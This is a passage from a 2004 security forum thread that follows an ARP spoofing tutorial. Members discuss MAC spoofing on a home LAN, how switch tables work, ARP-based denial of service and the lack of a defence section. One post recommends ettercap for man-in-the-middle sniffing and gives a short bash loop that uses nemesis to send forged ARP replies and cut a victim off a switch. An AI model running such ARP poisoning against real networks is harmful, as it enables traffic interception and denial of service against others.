-
August 16th, 2004, 04:13 PM
#11
Junior Member
I have a quick question on this matter: I have a local network consisting of a proxy server to the internet, a w2k box and a linux box. The three boxes are connected using a layer 2 (hw adress) switch.
I spoofed the mac adress of the linux box using ifconfig to the mac adress of the w2k box. So in the arp tables of the proxy, both the linux and the w2k box have the same mac adress. However, when I run tcpdump on the linux box, and I start surfing the net using the w2k box, I do not see the packets of the w2k box on the linux box, despite they both have the same mac adress.
How is this possible? Does the switch only forward packages to 1 port and refuses 2?
It got me puzzled. I expected to see the w2k packages on the linux machine after the spoof.
There are 10 kinds of people, those who can read binary, and those who can\'t.
-
August 16th, 2004, 10:29 PM
#12
Honestly, I’m not quite sure of the intricacies of the software/circuitry built into a switch. Has the Linux box sent any traffic to the network so the switch can notice its MAC address? Any other ideas guys?
-
August 16th, 2004, 10:34 PM
#13
What does the ARP table on the switch say abot the MAC addresses? After all, the way you described it, it will be the final arbiter.
Don\'t SYN us.... We\'ll SYN you.....
\"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides
-
August 16th, 2004, 11:27 PM
#14
Re: The Basics of Arpspoofing/Arppoisoning
Irongeek,
It's a very nice basic tutorial. However I would like to have seen a "securing your network" section that could mention how to employ certain technologies to secure your network ARP-based attacks. Also, some mention of non-MITM attacks using ARP might be handy (such as a network-wide DoS), as well as how to prevent them. Maybe a second tutorial that might mention these things, if you have any interest?
Chris Shepherd
The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
\"Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?\" -- Failed Insult
Is your whole family retarded, or did they just catch it from you?
-
August 17th, 2004, 12:05 AM
#15
Originally posted here by Tiger Shark
What does the ARP table on the switch say abot the MAC addresses? After all, the way you described it, it will be the final arbiter.
Thats what I thought... but then I got to thinking... can you even look at the mac table of a layer 2 switch? All of the layer two switches I have are not managed and I can't see the table. The ones that are managed are layer 2 and layer 3....
Maybe you just have to wait for the switch to update its table?
Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you\'ve saved, how much you haven\'t smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.
-
August 17th, 2004, 04:47 AM
#16
Re: Re: The Basics of Arpspoofing/Arppoisoning
Originally posted here by chsh
Irongeek,
It's a very nice basic tutorial. However I would like to have seen a "securing your network" section that could mention how to employ certain technologies to secure your network ARP-based attacks. Also, some mention of non-MITM attacks using ARP might be handy (such as a network-wide DoS), as well as how to prevent them. Maybe a second tutorial that might mention these things, if you have any interest?
I would be interested in writing such a tutorial, but doubt I have the resources to do it justice. I Know of a few ways ARP spoofing can be used for DoS, (like spoofing the gateway and turning off packet forwarding, or assuming the MAC address of an antenna in an Axon system) and I have ideas for possible solutions, but I don’t have the privileges on my network to really test them to make sure they the fixes work.
-
August 17th, 2004, 07:33 AM
#17
Junior Member
Well, the linux box was sending packets too. After the mac spoof, both machines behaved as before. I'm sure the linux mac was spoofed, cause when i looked at the arp table on the router, it listed the 2 IP adresses (one of the linux box, the other one of the w2k box) both with the same mac adress. I just don't understand that if a switch his "routing table" is based on the mac adress it is still able to work properly when it has 2 mac adresses that are the same. Only explanation could be that the switch somehow got hold of the real mac adress. So my spoofing was not effective.
Anyway, much thanks on the replies, and thanks for the great tutorial !
There are 10 kinds of people, those who can read binary, and those who can\'t.
-
August 17th, 2004, 10:04 AM
#18
Travish,
the switch doesn't have two ipadresses in his arp-table, it just updated the macadress with the ipadress from the victim to the attacker's ip adress, so you will cut off the vitcim in this example.
Now if you'd try a Man in the middle attack ( in this example sit between the switch and the victim ), with lets say ettercap, you'd poison in two directions, thus in the arptable of the switch you'd see the victim's ip adress with the attackers macadress, and the other way around on the victims arptable. In this example the victim would still be able to communicate and surf, while you read what he's doing with for.ex. tcpdump or another sniffer.
Anyway try ettercap for the mitm-attack, and this to see the difference :
Code:
#!/bin/bash
counter=0
while [ "$counter" != 1000 ]; do
sleep 1
nemesis arp -S <victim-ip> -D <switch-ip> -m <attacker-mac> -r
done
This is a very simple script to temporary poison a switch, but which would create a victim cut-off. the -r is crucial cause it tells its an arp-reply.
If you tcpdump then on your attackerbox, you'd see all present connections originally to the victim's box contimuing on the attackerbox.
-
August 17th, 2004, 10:20 AM
#19
Junior Member
Hey Schrekkie,
Thx for the reply. I think indeed my problem is I don't understand what's happening in the switch. Anyway, for the moment, the victim is not cut off, ever after spoofing. I'll reboot the switch after spoofing, who knows that has something to do with it.
After that I'll try the mitm attack, as explained by you and the tutorial. See how that works.
There are 10 kinds of people, those who can read binary, and those who can\'t.
-
August 17th, 2004, 10:38 AM
#20
Member
Errrrr guys, would we get flame for participating in this discussion of doing these illegal stuff?
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|